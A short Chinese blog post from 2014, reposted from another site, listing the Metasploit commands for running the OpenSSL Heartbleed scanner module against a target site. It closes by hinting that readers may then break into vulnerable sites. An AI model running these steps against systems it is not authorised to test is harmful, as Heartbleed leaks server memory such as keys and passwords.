2014年4月17日 星期四

讓 Kali Linux 內的 Metasploit 利用 OpenSSL "Heartbleed" 漏洞『路過』你的網站

讓 Kali Linux 內的 Metasploit 利用 OpenSSL "Heartbleed" 漏洞『路過』你的網站

OpenSSL "Heartbleed" 漏洞的危害,我相信應該大多關心資安的人都了解。這部示範影片原作者雖然只有錄製短短2分鐘,但說實在的沒有 Metasploit 操作概念還真不好懂他在幹嘛!

步驟:
1.更新 Metasploit
2.進入 msf 中
3.指令 use auxiliary/scanner/ssl/openssl_heartbleed
4.指令 show options
5.指令 set RHOST 目標網址
6.指令 set RPORT 443
7.指令 exploit


檢視目標網址是否具有漏洞。但如果檢測到有漏洞呢?接下來就只好讓粉絲發揮想像力了!『路過』一下了!

轉載自《網路攻防戰》